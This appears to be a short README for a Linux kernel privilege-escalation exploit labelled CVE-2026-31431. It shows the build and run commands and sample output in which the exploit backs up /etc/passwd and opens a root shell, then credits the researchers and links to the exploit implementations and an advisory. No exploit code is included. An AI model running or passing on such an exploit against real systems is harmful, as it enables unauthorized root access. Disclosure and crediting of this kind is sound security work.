Author: pyroceper
Tested on: Ubuntu 25.10 x86_64
$ make
$ ./exploit
[ * ] Detected kernel: 6.17.0
[ * ] Making backup of /etc/passwd to /tmp
[ * ] Backup saved as /tmp/passwd.bak
[ * ] Obtaining root shell...
#
# id
uid=0(pwn) gid=0(root) groups=0(root)
# whoami
pwn
- Original Vulnerability Discovery: Taeyang Lee and Xint Code Research Team
- Python Implementation: theori-io (https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py)
- C Implementation: tgies (https://github.com/tgies/copy-fail-c)
- Technical Article: https://security.utoronto.ca/advisories/copy-fail-linux-kernel-lpe-and-container-escape/